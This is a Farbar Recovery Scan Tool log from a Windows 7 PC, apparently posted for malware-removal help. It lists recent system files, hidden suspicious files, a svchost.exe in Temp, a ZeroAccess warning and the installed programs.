2016-09-22 23:58 - 2016-09-02 10:49 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\user.exe
2016-09-22 23:58 - 2016-09-02 10:48 - 00006144 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-security-base-l1-1-0.dll
2016-09-22 23:58 - 2016-09-02 10:48 - 00004608 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-threadpool-l1-1-0.dll
2016-09-22 23:58 - 2016-09-02 10:48 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-xstate-l1-1-0.dll
2016-09-22 23:58 - 2016-09-02 10:48 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-util-l1-1-0.dll
2016-09-22 23:58 - 2016-06-06 12:50 - 01483264 _____ (Microsoft Corporation) C:\Windows\system32\crypt32.dll
2016-09-22 23:58 - 2016-06-06 12:50 - 00228864 _____ (Microsoft Corporation) C:\Windows\system32\wintrust.dll
2016-09-22 23:58 - 2016-06-06 12:50 - 00190976 _____ (Microsoft Corporation) C:\Windows\system32\cryptsvc.dll
2016-09-22 23:58 - 2016-06-06 12:50 - 00141824 _____ (Microsoft Corporation) C:\Windows\system32\cryptnet.dll
2016-09-22 23:58 - 2016-06-06 11:23 - 01176064 _____ (Microsoft Corporation) C:\Windows\SysWOW64\crypt32.dll
2016-09-22 23:58 - 2016-06-06 11:23 - 00179200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wintrust.dll
2016-09-22 23:58 - 2016-06-06 11:23 - 00145920 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptsvc.dll
2016-09-22 23:58 - 2016-06-06 11:23 - 00106496 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptnet.dll
2016-09-22 23:58 - 2016-05-13 18:09 - 03156480 _____ (Microsoft Corporation) C:\Windows\system32\wucltux.dll
2016-09-22 23:58 - 2016-05-13 18:09 - 00192512 _____ (Microsoft Corporation) C:\Windows\system32\wuwebv.dll
2016-09-22 23:58 - 2016-05-13 18:09 - 00098816 _____ (Microsoft Corporation) C:\Windows\system32\wudriver.dll
2016-09-22 23:58 - 2016-05-13 18:07 - 00091136 _____ (Microsoft Corporation) C:\Windows\system32\WinSetupUI.dll
2016-09-22 23:58 - 2016-05-13 17:55 - 02607104 _____ (Microsoft Corporation) C:\Windows\system32\wuaueng.dll
2016-09-22 23:58 - 2016-05-13 17:53 - 00709120 _____ (Microsoft Corporation) C:\Windows\system32\wuapi.dll
2016-09-22 23:58 - 2016-05-13 17:53 - 00037888 _____ (Microsoft Corporation) C:\Windows\system32\wuapp.exe
2016-09-22 23:58 - 2016-05-13 17:52 - 00140288 _____ (Microsoft Corporation) C:\Windows\system32\wuauclt.exe
2016-09-22 23:58 - 2016-05-13 17:52 - 00037888 _____ (Microsoft Corporation) C:\Windows\system32\wups2.dll
2016-09-22 23:58 - 2016-05-13 17:52 - 00036864 _____ (Microsoft Corporation) C:\Windows\system32\wups.dll
2016-09-22 23:58 - 2016-05-13 17:52 - 00012288 _____ (Microsoft Corporation) C:\Windows\system32\wu.upgrade.ps.dll
2016-09-22 23:58 - 2016-05-13 17:50 - 00174080 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wuwebv.dll
2016-09-22 23:58 - 2016-05-13 17:38 - 00573440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wuapi.dll
2016-09-22 23:58 - 2016-05-13 17:38 - 00093696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wudriver.dll
2016-09-22 23:58 - 2016-05-13 17:38 - 00035328 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wuapp.exe
2016-09-22 23:58 - 2016-05-13 17:38 - 00030208 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wups.dll
2016-09-22 23:58 - 2016-05-12 13:14 - 00084992 _____ (Microsoft Corporation) C:\Windows\system32\asycfilt.dll
2016-09-22 23:58 - 2016-05-12 11:18 - 00090624 _____ (Microsoft Corporation) C:\Windows\SysWOW64\olepro32.dll
2016-09-22 23:58 - 2016-05-12 11:18 - 00067584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\asycfilt.dll
2016-09-22 23:58 - 2016-05-04 13:21 - 00114408 _____ (Microsoft Corporation) C:\Windows\system32\consent.exe
2016-09-22 23:58 - 2016-05-04 13:17 - 03244032 _____ (Microsoft Corporation) C:\Windows\system32\msi.dll
2016-09-22 23:58 - 2016-05-04 13:17 - 02365440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msi.dll
2016-09-22 23:58 - 2016-05-04 13:17 - 01806848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\authui.dll
2016-09-22 23:58 - 2016-05-04 13:17 - 00504320 _____ (Microsoft Corporation) C:\Windows\system32\msihnd.dll
2016-09-22 23:58 - 2016-05-04 13:17 - 00337408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msihnd.dll
2016-09-22 23:58 - 2016-05-04 13:17 - 00025088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msimsg.dll
2016-09-22 23:58 - 2016-05-04 13:17 - 00025088 _____ (Microsoft Corporation) C:\Windows\system32\msimsg.dll
2016-09-22 23:58 - 2016-05-04 13:16 - 01941504 _____ (Microsoft Corporation) C:\Windows\system32\authui.dll
2016-09-22 23:58 - 2016-05-04 13:16 - 00070144 _____ (Microsoft Corporation) C:\Windows\system32\appinfo.dll
2016-09-22 23:58 - 2016-05-04 11:04 - 00128512 _____ (Microsoft Corporation) C:\Windows\system32\msiexec.exe
2016-09-22 23:58 - 2016-05-04 10:55 - 00073216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msiexec.exe
2016-09-22 23:57 - 2016-08-16 13:36 - 01009152 _____ (Microsoft Corporation) C:\Windows\system32\user32.dll
2016-09-22 23:57 - 2016-08-15 22:48 - 00833024 _____ (Microsoft Corporation) C:\Windows\SysWOW64\user32.dll
2016-09-22 23:57 - 2016-08-15 22:35 - 03218432 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2016-09-22 23:57 - 2016-08-12 12:26 - 00464896 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srv.sys
2016-09-22 23:57 - 2016-08-12 12:26 - 00405504 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srv2.sys
2016-09-22 23:57 - 2016-08-12 12:26 - 00168960 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srvnet.sys
2016-09-22 23:57 - 2016-08-05 11:30 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\tzres.dll
2016-09-22 23:57 - 2016-08-05 11:13 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tzres.dll
2016-09-22 23:57 - 2016-07-07 11:36 - 01896168 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tcpip.sys
2016-09-22 23:57 - 2016-07-07 11:36 - 00377576 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\netio.sys
2016-09-22 23:57 - 2016-07-07 11:36 - 00287976 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\FWPKCLNT.SYS
2016-09-22 23:57 - 2016-07-07 11:08 - 00046080 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tcpipreg.sys
2016-09-22 23:57 - 2016-07-01 11:31 - 00976896 _____ (Microsoft Corporation) C:\Windows\system32\inetcomm.dll
2016-09-22 23:57 - 2016-07-01 11:31 - 00084480 _____ (Microsoft Corporation) C:\Windows\system32\INETRES.dll
2016-09-22 23:57 - 2016-07-01 11:13 - 00741888 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcomm.dll
2016-09-22 23:57 - 2016-07-01 11:13 - 00084480 _____ (Microsoft Corporation) C:\Windows\SysWOW64\INETRES.dll
2016-09-22 23:57 - 2016-06-25 20:35 - 00041704 _____ (Microsoft Corporation) C:\Windows\system32\CompatTelRunner.exe
2016-09-22 23:57 - 2016-06-25 20:27 - 01208320 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2016-09-22 23:57 - 2016-06-25 20:27 - 00970240 _____ (Microsoft Corporation) C:\Windows\system32\localspl.dll
2016-09-22 23:57 - 2016-06-25 20:27 - 00756736 _____ (Microsoft Corporation) C:\Windows\system32\win32spl.dll
2016-09-22 23:57 - 2016-06-25 20:27 - 00344576 _____ (Microsoft Corporation) C:\Windows\system32\ntprint.dll
2016-09-22 23:57 - 2016-06-25 20:27 - 00166400 _____ (Microsoft Corporation) C:\Windows\system32\inetpp.dll
2016-09-22 23:57 - 2016-06-25 20:27 - 00022528 _____ (Microsoft Corporation) C:\Windows\system32\inetppui.dll
2016-09-22 23:57 - 2016-06-25 15:54 - 00497152 _____ (Microsoft Corporation) C:\Windows\SysWOW64\win32spl.dll
2016-09-22 23:57 - 2016-06-25 15:53 - 00297472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntprint.dll
2016-09-22 23:57 - 2016-06-25 15:53 - 00061952 _____ (Microsoft Corporation) C:\Windows\system32\ntprint.exe
2016-09-22 23:57 - 2016-06-25 15:53 - 00048640 _____ (Microsoft Corporation) C:\Windows\system32\wpnpinst.exe
2016-09-22 23:57 - 2016-06-25 15:41 - 00061952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntprint.exe
2016-09-22 23:57 - 2016-06-22 09:06 - 00268800 _____ (Microsoft Corporation) C:\Windows\system32\centel.dll
2016-09-22 23:57 - 2016-06-17 14:24 - 01490432 _____ (Microsoft Corporation) C:\Windows\system32\appraiser.dll
2016-09-22 23:57 - 2016-06-17 14:24 - 00571904 _____ (Microsoft Corporation) C:\Windows\system32\generaltel.dll
2016-09-22 23:57 - 2016-06-17 14:24 - 00544256 _____ (Microsoft Corporation) C:\Windows\system32\devinv.dll
2016-09-22 23:57 - 2016-06-17 14:24 - 00294912 _____ (Microsoft Corporation) C:\Windows\system32\invagent.dll
2016-09-22 23:57 - 2016-06-17 14:24 - 00219136 _____ (Microsoft Corporation) C:\Windows\system32\aepic.dll
2016-09-22 23:57 - 2016-06-17 14:24 - 00076800 _____ (Microsoft Corporation) C:\Windows\system32\acmigration.dll
2016-09-22 23:49 - 2016-08-06 11:31 - 00877056 _____ (Microsoft Corporation) C:\Windows\system32\oleaut32.dll
2016-09-22 23:49 - 2016-08-06 11:15 - 00581632 _____ (Microsoft Corporation) C:\Windows\SysWOW64\oleaut32.dll
2016-09-21 21:47 - 2016-09-21 21:47 - 01042882 _____ C:\Users\Kevin\Desktop\Coord Design - Newsletter _1 (Kick-Off).pdf

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-10-19 00:13 - 2009-10-15 19:14 - 00000000 ____D C:\Users\Kevin\AppData\Roaming\uTorrent
2016-10-18 23:15 - 2009-07-14 00:45 - 00014848 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2016-10-18 23:15 - 2009-07-14 00:45 - 00014848 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2016-10-16 17:49 - 2014-09-01 21:28 - 00000000 ____D C:\Users\Kevin\AppData\Roaming\HandBrake
2016-10-16 01:00 - 2009-07-13 23:20 - 00000000 ____D C:\Windows\inf
2016-10-15 12:41 - 2009-07-14 01:13 - 00786598 _____ C:\Windows\system32\PerfStringBackup.INI
2016-10-14 21:00 - 2009-07-14 01:08 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2016-10-14 20:57 - 2013-10-13 17:20 - 00054736 _____ C:\Windows\system32\Drivers\hitmanpro37.sys
2016-10-14 20:19 - 2014-01-05 17:57 - 00000000 ____D C:\Program Files (x86)\Steam
2016-10-14 10:30 - 2009-07-13 22:34 - 126091264 _____ C:\Windows\system32\config\software-old
2016-10-14 10:20 - 2009-07-14 00:45 - 05161792 _____ C:\Windows\system32\FNTCACHE.DAT
2016-10-14 09:23 - 2014-07-12 11:20 - 00192216 _____ (Malwarebytes) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2016-10-11 10:52 - 2011-06-29 22:35 - 00002086 _____ C:\Users\Kevin\Documents\Default.rdp
2016-10-11 10:52 - 2009-07-14 01:32 - 00000000 ____D C:\Windows\system32\FxsTmp
2016-10-03 18:52 - 2015-12-13 17:20 - 00002195 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2016-10-03 18:52 - 2015-12-13 17:20 - 00002183 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2016-10-02 01:45 - 2016-05-17 08:19 - 00004476 _____ C:\Windows\System32\Tasks\Adobe Acrobat Update Task
2016-10-01 08:37 - 2009-07-14 01:32 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games
2016-09-25 21:41 - 2009-10-18 19:37 - 00000000 ____D C:\Users\Kevin\AppData\Roaming\Apple Computer
2016-09-25 20:03 - 2009-10-15 19:02 - 00134024 _____ C:\Users\Kevin\AppData\Local\GDIPFONTCACHEV1.DAT
2016-09-25 19:38 - 2012-09-01 18:58 - 00000132 _____ C:\Users\Kevin\AppData\Roaming\Adobe PNG Format CS6 Prefs
2016-09-24 11:07 - 2012-04-26 11:20 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2016-09-23 09:10 - 2009-07-13 23:20 - 00000000 ____D C:\Windows\rescache
2016-09-23 08:05 - 2011-05-31 18:38 - 00000000 ____D C:\Users\Kevin\AppData\Local\Apple Computer
2016-09-23 07:30 - 2011-12-22 01:04 - 00000000 ____D C:\Program Files\Microsoft Silverlight
2016-09-23 07:30 - 2011-12-22 01:04 - 00000000 ____D C:\Program Files (x86)\Microsoft Silverlight
2016-09-23 07:27 - 2015-06-13 09:59 - 00000000 ____D C:\Windows\system32\appraiser
2016-09-23 00:11 - 2015-06-13 09:24 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Silverlight
2016-09-23 00:07 - 2013-07-13 06:18 - 00000000 ____D C:\Windows\system32\MRT
2016-09-23 00:00 - 2009-10-15 18:06 - 144199024 ____C (Microsoft Corporation) C:\Windows\system32\MRT.exe

==================== Files in the root of some directories =======

2015-06-05 16:06 - 2015-06-05 16:06 - 0000132 _____ () C:\Users\Kevin\AppData\Roaming\Adobe GIF Format CS6 Prefs
2012-09-01 18:58 - 2016-09-25 19:38 - 0000132 _____ () C:\Users\Kevin\AppData\Roaming\Adobe PNG Format CS6 Prefs
2015-08-16 22:05 - 2015-08-16 22:05 - 0000146 _____ () C:\Users\Kevin\AppData\Roaming\default.rss
2011-04-02 08:41 - 2011-04-02 08:42 - 0002510 ___SH () C:\Users\Kevin\AppData\Local\05re0r73hpdmdp8g0u15a6u6kmy4
2011-04-05 22:00 - 2011-04-05 22:01 - 0001450 ___SH () C:\Users\Kevin\AppData\Local\3lhqy33xpt11p
2011-12-22 00:21 - 2011-12-22 00:25 - 0001990 ___SH () C:\Users\Kevin\AppData\Local\707007m0n800p846g213h4tqw3n0
2012-08-30 18:05 - 2016-01-24 00:11 - 0001456 _____ () C:\Users\Kevin\AppData\Local\Adobe Save for Web 13.0 Prefs
2016-04-26 19:26 - 2016-04-26 19:26 - 0003584 _____ () C:\Users\Kevin\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2011-12-21 01:52 - 2011-12-21 01:52 - 0004116 ___SH () C:\Users\Kevin\AppData\Local\kodnqs0knj7e5e0j5eb8ve8x1wvh0sr13v473ngqw8sblj
2011-12-02 23:58 - 2011-12-03 00:04 - 0005606 ___SH () C:\Users\Kevin\AppData\Local\osoqsb0a0dkx0xtv8lrw5g400l4n
2011-03-30 06:43 - 2011-03-30 06:49 - 0011354 ___SH () C:\Users\Kevin\AppData\Local\r0t835ni0n1t18aj4n071sa4s7m
2012-08-18 21:00 - 2012-08-18 21:00 - 0002747 _____ () C:\Users\Kevin\AppData\Local\recently-used.xbel
2009-10-18 00:26 - 2015-01-13 18:42 - 0007597 _____ () C:\Users\Kevin\AppData\Local\Resmon.ResmonCfg
2009-10-23 21:22 - 2015-02-18 23:30 - 0000083 ___SH () C:\ProgramData\.zreglib
2011-04-02 08:41 - 2011-04-02 08:42 - 0002510 ___SH () C:\ProgramData\05re0r73hpdmdp8g0u15a6u6kmy4
2011-04-05 22:00 - 2011-04-05 22:01 - 0001450 ___SH () C:\ProgramData\3lhqy33xpt11p
2011-05-17 21:07 - 2011-11-11 10:59 - 0003694 ____H () C:\ProgramData\hpzinstall.log
2011-12-21 01:52 - 2011-12-21 01:52 - 0004116 ___SH () C:\ProgramData\kodnqs0knj7e5e0j5eb8ve8x1wvh0sr13v473ngqw8sblj
2011-12-02 23:58 - 2011-12-03 00:04 - 0005606 ___SH () C:\ProgramData\osoqsb0a0dkx0xtv8lrw5g400l4n
2011-03-30 06:43 - 2011-03-30 06:49 - 0011354 ___SH () C:\ProgramData\r0t835ni0n1t18aj4n071sa4s7m
2011-12-03 00:17 - 2011-12-03 00:19 - 0000112 ____H () C:\ProgramData\tP5544K4.dat

Files to move or delete:
====================
C:\ProgramData\tP5544K4.dat


Some files in TEMP:
====================
C:\Users\Kevin\AppData\Local\Temp\svchost.exe


==================== Bamital & volsnap ======================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed
ATTENTION: ====> ZeroAccess. Use DeleteJunctionsIndirectory: C:\Windows\system64


LastRegBack: 2016-10-15 00:56

==================== End of FRST.txt ============================

 

 

 

 

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 17-10-2016
Ran by Kevin (19-10-2016 00:13:51)
Running from C:\Users\Kevin\Desktop
Windows 7 Ultimate Service Pack 1 (X64) (2009-10-15 21:56:18)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-1764878690-1872824068-2637823629-500 - Administrator - Disabled)
Guest (S-1-5-21-1764878690-1872824068-2637823629-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-1764878690-1872824068-2637823629-1002 - Limited - Enabled)
Kevin (S-1-5-21-1764878690-1872824068-2637823629-1001 - Administrator - Enabled) => C:\Users\Kevin

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AS: Windows Defender (Enabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

"Nero SoundTrax Help (x32 Version: 4.0.15.0 - Nero AG) Hidden
µTorrent (HKU\S-1-5-21-1764878690-1872824068-2637823629-1001\...\uTorrent) (Version: 3.4.9.42606 - BitTorrent Inc.)
64 Bit HP CIO Components Installer (Version: 6.2.1 - Hewlett-Packard) Hidden
Adobe Acrobat X Pro - English, Français, Deutsch (HKLM-x32\...\{AC76BA86-1033-F400-7760-000000000005}) (Version: 10.1.14 - Adobe Systems)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 3.3.0.3670 - Adobe Systems Incorporated)
Adobe Creative Suite 6 Master Collection (HKLM-x32\...\{E8AD3069-9EB7-4BA8-8BFE-83F4E69355C0}) (Version: 6 - Adobe Systems Incorporated)
Adobe Flash Player 21 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 21.0.0.213 - Adobe Systems Incorporated)
Adobe Flash Player 21 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 21.0.0.242 - Adobe Systems Incorporated)
Adobe Help Manager (HKLM-x32\...\chc.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1) (Version: 4.0.244 - Adobe Systems Incorporated)
Adobe Media Player (HKLM-x32\...\com.adobe.amp.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1) (Version: 1.1 - Adobe Systems Incorporated)
Adobe Reader XI (11.0.15) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.15 - Adobe Systems Incorporated)
Adobe Shockwave Player 12.0 (HKLM-x32\...\Adobe Shockwave Player) (Version: 12.0.9.149 - Adobe Systems, Inc.)
Adobe Widget Browser (HKLM-x32\...\com.adobe.WidgetBrowser) (Version: 2.0 Build 348 - Adobe Systems Incorporated.)
Adobe® Content Viewer (HKLM-x32\...\com.adobe.dmp.contentviewer) (Version: 2.9.0 - Adobe Systems Incorporated)
Advertising Center (x32 Version: 0.0.0.1 - Nero AG) Hidden
AIM 7 (HKLM-x32\...\AIM_7) (Version:  - )
AIM for Windows (HKU\S-1-5-21-1764878690-1872824068-2637823629-1001\...\AIM) (Version:  - AOL Inc.)
ANT Drivers Installer x64 (Version: 2.3.4 - Garmin Ltd or its subsidiaries) Hidden
Apple Application Support (32-bit) (HKLM-x32\...\{29DB9165-5FC1-48F0-9188-26123F526848}) (Version: 5.0.1 - Apple Inc.)
Apple Application Support (64-bit) (HKLM\...\{5905C8CF-1C88-4478-A48E-4E458AD1BC7E}) (Version: 5.0.1 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{D4D86CB2-2370-4691-8272-3869EDED6C64}) (Version: 10.0.0.18 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{56EC47AA-5813-4FF6-8E75-544026FBEA83}) (Version: 2.2.0.150 - Apple Inc.)
Avi to Dvd Free Converter v6.7.0.225 (HKLM-x32\...\Avi to Dvd Free Converter_is1) (Version:  - AviToDvdFree.com Inc.)
bl (x32 Version: 1.0.0 - Your Company Name) Hidden
Bonjour (HKLM\...\{56DDDFB8-7F79-4480-89D5-25E1F52AB28F}) (Version: 3.1.0.1 - Apple Inc.)
BufferChm (x32 Version: 130.0.331.000 - Hewlett-Packard) Hidden
C309g-m (x32 Version: 130.0.396.000 - Hewlett-Packard) Hidden
calibre (HKLM-x32\...\{6B49AD82-52A4-43D9-BA5D-76C2CFD11A30}) (Version: 0.8.65 - Kovid Goyal)
Castle of Illusion (HKLM\...\Steam App 227600) (Version:  - SEGA Studios Australia)
CCleaner (HKLM\...\CCleaner) (Version: 5.15 - Piriform)
CDisplay 1.8 (HKLM-x32\...\CDisplay_is1) (Version:  - dvd8n)
Cisco EAP-FAST Module (HKLM-x32\...\{64BF0187-F3D2-498B-99EA-163AF9AE6EC9}) (Version: 2.2.14 - Cisco Systems, Inc.)
Cisco LEAP Module (HKLM-x32\...\{51C7AD07-C3F6-4635-8E8A-231306D810FE}) (Version: 1.0.19 - Cisco Systems, Inc.)
Cisco PEAP Module (HKLM-x32\...\{ED5776D5-59B4-46B7-AF81-5F2D94D7C640}) (Version: 1.1.6 - Cisco Systems, Inc.)
ConvertHelper 3.0 (HKLM\...\{27CC6AB1-E72B-4179-AF1A-EAE507EBAF52}}_is1) (Version:  - DownloadHelper)
Coupon Printer for Windows (HKLM-x32\...\Coupon Printer for Windows5.0.0.4) (Version: 5.0.0.4 - Coupons.com Incorporated)
CPUID CPU-Z 1.72 (HKLM\...\CPUID CPU-Z_is1) (Version:  - )
Crazy Taxi (HKLM-x32\...\Steam App 71230) (Version:  - SEGA)
CutePDF Writer 2.8 (HKLM\...\CutePDF Writer Installation) (Version:  - )
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
Defraggler (HKLM\...\Defraggler) (Version: 2.09 - Piriform)
Destinations (x32 Version: 130.0.0.0 - Hewlett-Packard) Hidden
DeviceDiscovery (x32 Version: 130.0.372.000 - Hewlett-Packard) Hidden
DHTML Editing Component (HKLM-x32\...\{2EA870FA-585F-4187-903D-CB9FFD21E2E0}) (Version: 6.02.0002 - Microsoft Corporation)
DocProc (x32 Version: 140.0.99.000 - Hewlett-Packard) Hidden
DolbyFiles (x32 Version: 2.0 - Nero AG) Hidden
Download Updater (AOL Inc.) (HKLM-x32\...\SoftwareUpdUtility) (Version:  - AOL Inc.) <==== ATTENTION
Dual-Core Optimizer (HKLM-x32\...\{9FD6F1A8-5550-46AF-8509-271DF0E768B5}) (Version: 1.1.4.0169 - AMD)
EaseUS Partition Master 9.1.1 Home Edition (HKLM-x32\...\EaseUS Partition Master Home Edition_is1) (Version:  - EaseUS)
Elevated Installer (x32 Version: 4.1.16.0 - Garmin Ltd or its subsidiaries) Hidden
eReg (x32 Version: 1.20.138.34 - Logitech, Inc.) Hidden
FileASSASSIN (HKLM-x32\...\FileASSASSIN) (Version: 1.06 - Malwarebytes)
Fraps (remove only) (HKLM-x32\...\Fraps) (Version:  - )
Garmin Communicator Plugin x64 (HKLM\...\{550331CC-C34B-494F-BCDA-37CE4EF6E924}) (Version: 4.0.3 - Garmin Ltd or its subsidiaries)
Garmin Express (HKLM-x32\...\{0733d53f-b41d-47cc-b336-d95751c4b2cb}) (Version: 4.1.16.0 - Garmin Ltd or its subsidiaries)
Garmin Express (x32 Version: 4.1.16.0 - Garmin Ltd or its subsidiaries) Hidden
Garmin Express Tray (x32 Version: 4.1.16.0 - Garmin Ltd or its subsidiaries) Hidden
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 53.0.2785.143 - Google Inc.)
Google Update Helper (x32 Version: 1.3.31.5 - Google Inc.) Hidden
GPBaseService2 (x32 Version: 130.0.371.000 - Hewlett-Packard) Hidden
HandBrake 0.9.9.1 (HKLM-x32\...\HandBrake) (Version: 0.9.9.1 - )
HL-2240 (HKLM-x32\...\{E2A97415-BD97-4867-B906-05E39E9EE51F}) (Version: 1.0.7.0 - Brother Industries, Ltd.)
HP Imaging Device Functions 13.0 (HKLM\...\HP Imaging Device Functions) (Version: 13.0 - HP)
HP Photosmart Premium C309g-m All-In-One Driver Software 13.0 Rel .6 (HKLM\...\{181AC4C7-B83C-4B5F-B566-E19BF2472429}) (Version: 13.0 - HP)
HP Solution Center 13.0 (HKLM\...\HP Solution Center & Imaging Support Tools) (Version: 13.0 - HP)
HP Support Solutions Framework (HKLM-x32\...\{96D12EC9-720B-45FB-904C-36D6307A1C76}) (Version: 11.51.0048 - Hewlett-Packard Company)
HPPhotoGadget (x32 Version: 130.0.282.000 - Hewlett-Packard) Hidden
HPProductAssistant (x32 Version: 130.0.371.000 - Hewlett-Packard) Hidden
hpWLPGInstaller (x32 Version: 130.0.303.000 - Hewlett-Packard) Hidden
iCloud (HKLM\...\{724A887F-2B55-4306-B6F9-8F0E7A04B1B5}) (Version: 5.2.2.87 - Apple Inc.)
ImagXpress (x32 Version: 7.0.74.0 - Nero AG) Hidden
Intel® Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.10.3939 - Intel Corporation)
Intel® USB 3.0 eXtensible Host Controller Driver (HKLM-x32\...\{240C3DDD-C5E9-4029-9DF7-95650D040CF2}) (Version: 3.0.4.65 - Intel Corporation)
Internet TV for Windows Media Center (HKLM-x32\...\{9D318C86-AF4C-409F-A6AC-7183FF4CF424}) (Version: 3.2.1.0 - Microsoft Corporation)
iTunes (HKLM\...\{9946A4F7-E0FD-4A33-82D1-06CBFFBBB9F9}) (Version: 12.5.1.21 - Apple Inc.)
Java 8 Update 91 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218091F0}) (Version: 8.0.910.14 - Oracle Corporation)
JavaFX 2.1.1 (HKLM-x32\...\{1111706F-666A-4037-7777-211328764D10}) (Version: 2.1.1 - Oracle Corporation)
K-Lite Codec Pack 11.4.0 Full (HKLM-x32\...\KLiteCodecPack_is1) (Version: 11.4.0 - )
LG United Mobile Drivers (HKLM-x32\...\{B03954CC-E130-4E57-BC83-869978685902}) (Version: 3.3.0.0 - LG Electronics)
Logitech SetPoint 6.32 (HKLM\...\SP6) (Version: 6.32.20 - Logitech)
Logitech Unifying Software 2.00 (HKLM\...\Logitech Unifying) (Version: 2.00.43 - Logitech)
Macromedia FreeHand MXa (HKLM-x32\...\{939740B5-0064-4779-854A-8C1086181C05}) (Version: 11.0.2 - Macromedia)
Malwarebytes Anti-Malware version 2.2.1.1043 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.2.1.1043 - Malwarebytes)
Menu Templates - Starter Kit (x32 Version: 9.0.4.0 - Nero AG) Hidden
Microsoft .NET Framework 4.6.1 (Deutsch) (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1031) (Version: 4.6.01055 - Microsoft Corporation)
Microsoft .NET Framework 4.6.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.6.01055 - Microsoft Corporation)
Microsoft Office 2007 Service Pack 3 (SP3) (HKLM-x32\...\{91120000-0030-0000-0000-0000000FF1CE}_ENTERPRISER_{6E107EB7-8B55-48BF-ACCB-199F86A2CD93}) (Version:  - Microsoft)
Microsoft Office Enterprise 2007 (HKLM-x32\...\ENTERPRISER) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft Office File Validation Add-In (HKLM-x32\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation)
